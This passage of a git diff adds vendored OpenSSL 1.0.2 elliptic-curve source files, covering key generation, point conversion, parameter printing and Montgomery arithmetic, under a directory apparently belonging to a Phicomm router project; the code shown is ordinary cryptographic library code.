+            ECerr(EC_F_PKEY_EC_CTRL_STR, EC_R_INVALID_DIGEST);
+            return 0;
+        }
+        return EVP_PKEY_CTX_set_ecdh_kdf_md(ctx, md);
+    } else if (!strcmp(type, "ecdh_cofactor_mode")) {
+        int co_mode;
+        co_mode = atoi(value);
+        return EVP_PKEY_CTX_set_ecdh_cofactor_mode(ctx, co_mode);
+    }
+
+    return -2;
+}
+
+static int pkey_ec_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    EC_KEY *ec = NULL;
+    EC_PKEY_CTX *dctx = ctx->data;
+    int ret = 0;
+    if (dctx->gen_group == NULL) {
+        ECerr(EC_F_PKEY_EC_PARAMGEN, EC_R_NO_PARAMETERS_SET);
+        return 0;
+    }
+    ec = EC_KEY_new();
+    if (!ec)
+        return 0;
+    ret = EC_KEY_set_group(ec, dctx->gen_group);
+    if (ret)
+        EVP_PKEY_assign_EC_KEY(pkey, ec);
+    else
+        EC_KEY_free(ec);
+    return ret;
+}
+
+static int pkey_ec_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    EC_KEY *ec = NULL;
+    EC_PKEY_CTX *dctx = ctx->data;
+    if (ctx->pkey == NULL && dctx->gen_group == NULL) {
+        ECerr(EC_F_PKEY_EC_KEYGEN, EC_R_NO_PARAMETERS_SET);
+        return 0;
+    }
+    ec = EC_KEY_new();
+    if (!ec)
+        return 0;
+    EVP_PKEY_assign_EC_KEY(pkey, ec);
+    if (ctx->pkey) {
+        /* Note: if error return, pkey is freed by parent routine */
+        if (!EVP_PKEY_copy_parameters(pkey, ctx->pkey))
+            return 0;
+    } else {
+        if (!EC_KEY_set_group(ec, dctx->gen_group))
+            return 0;
+    }
+    return EC_KEY_generate_key(pkey->pkey.ec);
+}
+
+const EVP_PKEY_METHOD ec_pkey_meth = {
+    EVP_PKEY_EC,
+    0,
+    pkey_ec_init,
+    pkey_ec_copy,
+    pkey_ec_cleanup,
+
+    0,
+    pkey_ec_paramgen,
+
+    0,
+    pkey_ec_keygen,
+
+    0,
+    pkey_ec_sign,
+
+    0,
+    pkey_ec_verify,
+
+    0, 0,
+
+    0, 0, 0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    0,
+#ifndef OPENSSL_NO_ECDH
+    pkey_ec_kdf_derive,
+#else
+    0,
+#endif
+
+    pkey_ec_ctrl,
+    pkey_ec_ctrl_str
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_print.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_print.c
new file mode 100644
index 0000000..96b294d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_print.c
@@ -0,0 +1,179 @@
+/* crypto/ec/ec_print.c */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/crypto.h>
+#include "ec_lcl.h"
+
+BIGNUM *EC_POINT_point2bn(const EC_GROUP *group,
+                          const EC_POINT *point,
+                          point_conversion_form_t form,
+                          BIGNUM *ret, BN_CTX *ctx)
+{
+    size_t buf_len = 0;
+    unsigned char *buf;
+
+    buf_len = EC_POINT_point2oct(group, point, form, NULL, 0, ctx);
+    if (buf_len == 0)
+        return NULL;
+
+    if ((buf = OPENSSL_malloc(buf_len)) == NULL)
+        return NULL;
+
+    if (!EC_POINT_point2oct(group, point, form, buf, buf_len, ctx)) {
+        OPENSSL_free(buf);
+        return NULL;
+    }
+
+    ret = BN_bin2bn(buf, buf_len, ret);
+
+    OPENSSL_free(buf);
+
+    return ret;
+}
+
+EC_POINT *EC_POINT_bn2point(const EC_GROUP *group,
+                            const BIGNUM *bn, EC_POINT *point, BN_CTX *ctx)
+{
+    size_t buf_len = 0;
+    unsigned char *buf;
+    EC_POINT *ret;
+
+    if ((buf_len = BN_num_bytes(bn)) == 0)
+        return NULL;
+    buf = OPENSSL_malloc(buf_len);
+    if (buf == NULL)
+        return NULL;
+
+    if (!BN_bn2bin(bn, buf)) {
+        OPENSSL_free(buf);
+        return NULL;
+    }
+
+    if (point == NULL) {
+        if ((ret = EC_POINT_new(group)) == NULL) {
+            OPENSSL_free(buf);
+            return NULL;
+        }
+    } else
+        ret = point;
+
+    if (!EC_POINT_oct2point(group, ret, buf, buf_len, ctx)) {
+        if (point == NULL)
+            EC_POINT_clear_free(ret);
+        OPENSSL_free(buf);
+        return NULL;
+    }
+
+    OPENSSL_free(buf);
+    return ret;
+}
+
+static const char *HEX_DIGITS = "0123456789ABCDEF";
+
+/* the return value must be freed (using OPENSSL_free()) */
+char *EC_POINT_point2hex(const EC_GROUP *group,
+                         const EC_POINT *point,
+                         point_conversion_form_t form, BN_CTX *ctx)
+{
+    char *ret, *p;
+    size_t buf_len = 0, i;
+    unsigned char *buf, *pbuf;
+
+    buf_len = EC_POINT_point2oct(group, point, form, NULL, 0, ctx);
+    if (buf_len == 0)
+        return NULL;
+
+    if ((buf = OPENSSL_malloc(buf_len)) == NULL)
+        return NULL;
+
+    if (!EC_POINT_point2oct(group, point, form, buf, buf_len, ctx)) {
+        OPENSSL_free(buf);
+        return NULL;
+    }
+
+    ret = (char *)OPENSSL_malloc(buf_len * 2 + 2);
+    if (ret == NULL) {
+        OPENSSL_free(buf);
+        return NULL;
+    }
+    p = ret;
+    pbuf = buf;
+    for (i = buf_len; i > 0; i--) {
+        int v = (int)*(pbuf++);
+        *(p++) = HEX_DIGITS[v >> 4];
+        *(p++) = HEX_DIGITS[v & 0x0F];
+    }
+    *p = '\0';
+
+    OPENSSL_free(buf);
+
+    return ret;
+}
+
+EC_POINT *EC_POINT_hex2point(const EC_GROUP *group,
+                             const char *buf, EC_POINT *point, BN_CTX *ctx)
+{
+    EC_POINT *ret = NULL;
+    BIGNUM *tmp_bn = NULL;
+
+    if (!BN_hex2bn(&tmp_bn, buf))
+        return NULL;
+
+    ret = EC_POINT_bn2point(group, tmp_bn, point, ctx);
+
+    BN_clear_free(tmp_bn);
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/eck_prn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/eck_prn.c
new file mode 100644
index 0000000..515b262
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/eck_prn.c
@@ -0,0 +1,375 @@
+/* crypto/ec/eck_prn.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Portions originally developed by SUN MICROSYSTEMS, INC., and
+ * contributed to the OpenSSL project.
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/ec.h>
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_FP_API
+int ECPKParameters_print_fp(FILE *fp, const EC_GROUP *x, int off)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        ECerr(EC_F_ECPKPARAMETERS_PRINT_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = ECPKParameters_print(b, x, off);
+    BIO_free(b);
+    return (ret);
+}
+
+int EC_KEY_print_fp(FILE *fp, const EC_KEY *x, int off)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        ECerr(EC_F_EC_KEY_PRINT_FP, ERR_R_BIO_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = EC_KEY_print(b, x, off);
+    BIO_free(b);
+    return (ret);
+}
+
+int ECParameters_print_fp(FILE *fp, const EC_KEY *x)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        ECerr(EC_F_ECPARAMETERS_PRINT_FP, ERR_R_BIO_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = ECParameters_print(b, x);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int EC_KEY_print(BIO *bp, const EC_KEY *x, int off)
+{
+    EVP_PKEY *pk;
+    int ret;
+    pk = EVP_PKEY_new();
+    if (!pk || !EVP_PKEY_set1_EC_KEY(pk, (EC_KEY *)x))
+        return 0;
+    ret = EVP_PKEY_print_private(bp, pk, off, NULL);
+    EVP_PKEY_free(pk);
+    return ret;
+}
+
+int ECParameters_print(BIO *bp, const EC_KEY *x)
+{
+    EVP_PKEY *pk;
+    int ret;
+    pk = EVP_PKEY_new();
+    if (!pk || !EVP_PKEY_set1_EC_KEY(pk, (EC_KEY *)x))
+        return 0;
+    ret = EVP_PKEY_print_params(bp, pk, 4, NULL);
+    EVP_PKEY_free(pk);
+    return ret;
+}
+
+static int print_bin(BIO *fp, const char *str, const unsigned char *num,
+                     size_t len, int off);
+
+int ECPKParameters_print(BIO *bp, const EC_GROUP *x, int off)
+{
+    unsigned char *buffer = NULL;
+    size_t buf_len = 0, i;
+    int ret = 0, reason = ERR_R_BIO_LIB;
+    BN_CTX *ctx = NULL;
+    const EC_POINT *point = NULL;
+    BIGNUM *p = NULL, *a = NULL, *b = NULL, *gen = NULL,
+        *order = NULL, *cofactor = NULL;
+    const unsigned char *seed;
+    size_t seed_len = 0;
+
+    static const char *gen_compressed = "Generator (compressed):";
+    static const char *gen_uncompressed = "Generator (uncompressed):";
+    static const char *gen_hybrid = "Generator (hybrid):";
+
+    if (!x) {
+        reason = ERR_R_PASSED_NULL_PARAMETER;
+        goto err;
+    }
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL) {
+        reason = ERR_R_MALLOC_FAILURE;
+        goto err;
+    }
+
+    if (EC_GROUP_get_asn1_flag(x)) {
+        /* the curve parameter are given by an asn1 OID */
+        int nid;
+        const char *nname;
+
+        if (!BIO_indent(bp, off, 128))
+            goto err;
+
+        nid = EC_GROUP_get_curve_name(x);
+        if (nid == 0)
+            goto err;
+
+        if (BIO_printf(bp, "ASN1 OID: %s", OBJ_nid2sn(nid)) <= 0)
+            goto err;
+        if (BIO_printf(bp, "\n") <= 0)
+            goto err;
+        nname = EC_curve_nid2nist(nid);
+        if (nname) {
+            if (!BIO_indent(bp, off, 128))
+                goto err;
+            if (BIO_printf(bp, "NIST CURVE: %s\n", nname) <= 0)
+                goto err;
+        }
+    } else {
+        /* explicit parameters */
+        int is_char_two = 0;
+        point_conversion_form_t form;
+        int tmp_nid = EC_METHOD_get_field_type(EC_GROUP_method_of(x));
+
+        if (tmp_nid == NID_X9_62_characteristic_two_field)
+            is_char_two = 1;
+
+        if ((p = BN_new()) == NULL || (a = BN_new()) == NULL ||
+            (b = BN_new()) == NULL || (order = BN_new()) == NULL ||
+            (cofactor = BN_new()) == NULL) {
+            reason = ERR_R_MALLOC_FAILURE;
+            goto err;
+        }
+#ifndef OPENSSL_NO_EC2M
+        if (is_char_two) {
+            if (!EC_GROUP_get_curve_GF2m(x, p, a, b, ctx)) {
+                reason = ERR_R_EC_LIB;
+                goto err;
+            }
+        } else                  /* prime field */
+#endif
+        {
+            if (!EC_GROUP_get_curve_GFp(x, p, a, b, ctx)) {
+                reason = ERR_R_EC_LIB;
+                goto err;
+            }
+        }
+
+        if ((point = EC_GROUP_get0_generator(x)) == NULL) {
+            reason = ERR_R_EC_LIB;
+            goto err;
+        }
+        if (!EC_GROUP_get_order(x, order, NULL) ||
+            !EC_GROUP_get_cofactor(x, cofactor, NULL)) {
+            reason = ERR_R_EC_LIB;
+            goto err;
+        }
+
+        form = EC_GROUP_get_point_conversion_form(x);
+
+        if ((gen = EC_POINT_point2bn(x, point, form, NULL, ctx)) == NULL) {
+            reason = ERR_R_EC_LIB;
+            goto err;
+        }
+
+        buf_len = (size_t)BN_num_bytes(p);
+        if (buf_len < (i = (size_t)BN_num_bytes(a)))
+            buf_len = i;
+        if (buf_len < (i = (size_t)BN_num_bytes(b)))
+            buf_len = i;
+        if (buf_len < (i = (size_t)BN_num_bytes(gen)))
+            buf_len = i;
+        if (buf_len < (i = (size_t)BN_num_bytes(order)))
+            buf_len = i;
+        if (buf_len < (i = (size_t)BN_num_bytes(cofactor)))
+            buf_len = i;
+
+        if ((seed = EC_GROUP_get0_seed(x)) != NULL)
+            seed_len = EC_GROUP_get_seed_len(x);
+
+        buf_len += 10;
+        if ((buffer = OPENSSL_malloc(buf_len)) == NULL) {
+            reason = ERR_R_MALLOC_FAILURE;
+            goto err;
+        }
+
+        if (!BIO_indent(bp, off, 128))
+            goto err;
+
+        /* print the 'short name' of the field type */
+        if (BIO_printf(bp, "Field Type: %s\n", OBJ_nid2sn(tmp_nid))
+            <= 0)
+            goto err;
+
+        if (is_char_two) {
+            /* print the 'short name' of the base type OID */
+            int basis_type = EC_GROUP_get_basis_type(x);
+            if (basis_type == 0)
+                goto err;
+
+            if (!BIO_indent(bp, off, 128))
+                goto err;
+
+            if (BIO_printf(bp, "Basis Type: %s\n",
+                           OBJ_nid2sn(basis_type)) <= 0)
+                goto err;
+
+            /* print the polynomial */
+            if ((p != NULL) && !ASN1_bn_print(bp, "Polynomial:", p, buffer,
+                                              off))
+                goto err;
+        } else {
+            if ((p != NULL) && !ASN1_bn_print(bp, "Prime:", p, buffer, off))
+                goto err;
+        }
+        if ((a != NULL) && !ASN1_bn_print(bp, "A:   ", a, buffer, off))
+            goto err;
+        if ((b != NULL) && !ASN1_bn_print(bp, "B:   ", b, buffer, off))
+            goto err;
+        if (form == POINT_CONVERSION_COMPRESSED) {
+            if ((gen != NULL) && !ASN1_bn_print(bp, gen_compressed, gen,
+                                                buffer, off))
+                goto err;
+        } else if (form == POINT_CONVERSION_UNCOMPRESSED) {
+            if ((gen != NULL) && !ASN1_bn_print(bp, gen_uncompressed, gen,
+                                                buffer, off))
+                goto err;
+        } else {                /* form == POINT_CONVERSION_HYBRID */
+
+            if ((gen != NULL) && !ASN1_bn_print(bp, gen_hybrid, gen,
+                                                buffer, off))
+                goto err;
+        }
+        if ((order != NULL) && !ASN1_bn_print(bp, "Order: ", order,
+                                              buffer, off))
+            goto err;
+        if ((cofactor != NULL) && !ASN1_bn_print(bp, "Cofactor: ", cofactor,
+                                                 buffer, off))
+            goto err;
+        if (seed && !print_bin(bp, "Seed:", seed, seed_len, off))
+            goto err;
+    }
+    ret = 1;
+ err:
+    if (!ret)
+        ECerr(EC_F_ECPKPARAMETERS_PRINT, reason);
+    if (p)
+        BN_free(p);
+    if (a)
+        BN_free(a);
+    if (b)
+        BN_free(b);
+    if (gen)
+        BN_free(gen);
+    if (order)
+        BN_free(order);
+    if (cofactor)
+        BN_free(cofactor);
+    if (ctx)
+        BN_CTX_free(ctx);
+    if (buffer != NULL)
+        OPENSSL_free(buffer);
+    return (ret);
+}
+
+static int print_bin(BIO *fp, const char *name, const unsigned char *buf,
+                     size_t len, int off)
+{
+    size_t i;
+    char str[128];
+
+    if (buf == NULL)
+        return 1;
+    if (off) {
+        if (off > 128)
+            off = 128;
+        memset(str, ' ', off);
+        if (BIO_write(fp, str, off) <= 0)
+            return 0;
+    }
+
+    if (BIO_printf(fp, "%s", name) <= 0)
+        return 0;
+
+    for (i = 0; i < len; i++) {
+        if ((i % 15) == 0) {
+            str[0] = '\n';
+            memset(&(str[1]), ' ', off + 4);
+            if (BIO_write(fp, str, off + 1 + 4) <= 0)
+                return 0;
+        }
+        if (BIO_printf(fp, "%02x%s", buf[i], ((i + 1) == len) ? "" : ":") <=
+            0)
+            return 0;
+    }
+    if (BIO_write(fp, "\n", 1) <= 0)
+        return 0;
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_mont.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_mont.c
new file mode 100644
index 0000000..b2de7fa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_mont.c
@@ -0,0 +1,308 @@
+/* crypto/ec/ecp_mont.c */
+/*
+ * Originally written by Bodo Moeller for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Portions of this software developed by SUN MICROSYSTEMS, INC.,
+ * and contributed to the OpenSSL project.
+ */
+
+#include <openssl/err.h>
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+#include "ec_lcl.h"
+
+const EC_METHOD *EC_GFp_mont_method(void)
+{
+    static const EC_METHOD ret = {
+        EC_FLAGS_DEFAULT_OCT,
+        NID_X9_62_prime_field,
+        ec_GFp_mont_group_init,
+        ec_GFp_mont_group_finish,
+        ec_GFp_mont_group_clear_finish,
+        ec_GFp_mont_group_copy,
+        ec_GFp_mont_group_set_curve,
+        ec_GFp_simple_group_get_curve,
+        ec_GFp_simple_group_get_degree,
+        ec_GFp_simple_group_check_discriminant,
+        ec_GFp_simple_point_init,
+        ec_GFp_simple_point_finish,
+        ec_GFp_simple_point_clear_finish,
+        ec_GFp_simple_point_copy,
+        ec_GFp_simple_point_set_to_infinity,
+        ec_GFp_simple_set_Jprojective_coordinates_GFp,
+        ec_GFp_simple_get_Jprojective_coordinates_GFp,
+        ec_GFp_simple_point_set_affine_coordinates,
+        ec_GFp_simple_point_get_affine_coordinates,
+        0, 0, 0,
+        ec_GFp_simple_add,
+        ec_GFp_simple_dbl,
+        ec_GFp_simple_invert,
+        ec_GFp_simple_is_at_infinity,
+        ec_GFp_simple_is_on_curve,
+        ec_GFp_simple_cmp,
+        ec_GFp_simple_make_affine,
+        ec_GFp_simple_points_make_affine,
+        0 /* mul */ ,
+        0 /* precompute_mult */ ,
+        0 /* have_precompute_mult */ ,
+        ec_GFp_mont_field_mul,
+        ec_GFp_mont_field_sqr,
+        0 /* field_div */ ,
+        ec_GFp_mont_field_encode,
+        ec_GFp_mont_field_decode,
+        ec_GFp_mont_field_set_to_one
+    };
+
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return fips_ec_gfp_mont_method();
+#endif
+
+    return &ret;
+}
+
+int ec_GFp_mont_group_init(EC_GROUP *group)
+{
+    int ok;
+
+    ok = ec_GFp_simple_group_init(group);
+    group->field_data1 = NULL;
+    group->field_data2 = NULL;
+    return ok;
+}
+
+void ec_GFp_mont_group_finish(EC_GROUP *group)
+{
+    if (group->field_data1 != NULL) {
+        BN_MONT_CTX_free(group->field_data1);
+        group->field_data1 = NULL;
+    }
+    if (group->field_data2 != NULL) {
+        BN_free(group->field_data2);
+        group->field_data2 = NULL;
+    }
+    ec_GFp_simple_group_finish(group);
+}
+
+void ec_GFp_mont_group_clear_finish(EC_GROUP *group)
+{
+    if (group->field_data1 != NULL) {
+        BN_MONT_CTX_free(group->field_data1);
+        group->field_data1 = NULL;
+    }
+    if (group->field_data2 != NULL) {
+        BN_clear_free(group->field_data2);
+        group->field_data2 = NULL;
+    }
+    ec_GFp_simple_group_clear_finish(group);
+}
+
+int ec_GFp_mont_group_copy(EC_GROUP *dest, const EC_GROUP *src)
+{
+    if (dest->field_data1 != NULL) {
+        BN_MONT_CTX_free(dest->field_data1);
+        dest->field_data1 = NULL;
+    }
+    if (dest->field_data2 != NULL) {
+        BN_clear_free(dest->field_data2);
+        dest->field_data2 = NULL;
+    }
+
+    if (!ec_GFp_simple_group_copy(dest, src))
+        return 0;
+
+    if (src->field_data1 != NULL) {
+        dest->field_data1 = BN_MONT_CTX_new();
+        if (dest->field_data1 == NULL)
+            return 0;
+        if (!BN_MONT_CTX_copy(dest->field_data1, src->field_data1))
+            goto err;
+    }
+    if (src->field_data2 != NULL) {
+        dest->field_data2 = BN_dup(src->field_data2);
+        if (dest->field_data2 == NULL)
+            goto err;
+    }
+
+    return 1;
+
+ err:
+    if (dest->field_data1 != NULL) {
+        BN_MONT_CTX_free(dest->field_data1);
+        dest->field_data1 = NULL;
+    }
+    return 0;
+}
+
+int ec_GFp_mont_group_set_curve(EC_GROUP *group, const BIGNUM *p,
+                                const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    BN_MONT_CTX *mont = NULL;
+    BIGNUM *one = NULL;
+    int ret = 0;
+
+    if (group->field_data1 != NULL) {
+        BN_MONT_CTX_free(group->field_data1);
+        group->field_data1 = NULL;
+    }
+    if (group->field_data2 != NULL) {
+        BN_free(group->field_data2);
+        group->field_data2 = NULL;
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    mont = BN_MONT_CTX_new();
+    if (mont == NULL)
+        goto err;
+    if (!BN_MONT_CTX_set(mont, p, ctx)) {
+        ECerr(EC_F_EC_GFP_MONT_GROUP_SET_CURVE, ERR_R_BN_LIB);
+        goto err;
+    }
+    one = BN_new();
+    if (one == NULL)
+        goto err;
+    if (!BN_to_montgomery(one, BN_value_one(), mont, ctx))
+        goto err;
+
+    group->field_data1 = mont;
+    mont = NULL;
+    group->field_data2 = one;
+    one = NULL;
+
+    ret = ec_GFp_simple_group_set_curve(group, p, a, b, ctx);
+
+    if (!ret) {
+        BN_MONT_CTX_free(group->field_data1);
+        group->field_data1 = NULL;
+        BN_free(group->field_data2);
+        group->field_data2 = NULL;
+    }
+
+ err:
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (mont != NULL)
+        BN_MONT_CTX_free(mont);
+    return ret;
+}
+
+int ec_GFp_mont_field_mul(const EC_GROUP *group, BIGNUM *r, const BIGNUM *a,
+                          const BIGNUM *b, BN_CTX *ctx)
+{
+    if (group->field_data1 == NULL) {
+        ECerr(EC_F_EC_GFP_MONT_FIELD_MUL, EC_R_NOT_INITIALIZED);
+        return 0;
+    }
+
+    return BN_mod_mul_montgomery(r, a, b, group->field_data1, ctx);
+}
+
+int ec_GFp_mont_field_sqr(const EC_GROUP *group, BIGNUM *r, const BIGNUM *a,
+                          BN_CTX *ctx)
+{
+    if (group->field_data1 == NULL) {
+        ECerr(EC_F_EC_GFP_MONT_FIELD_SQR, EC_R_NOT_INITIALIZED);
+        return 0;
+    }
+
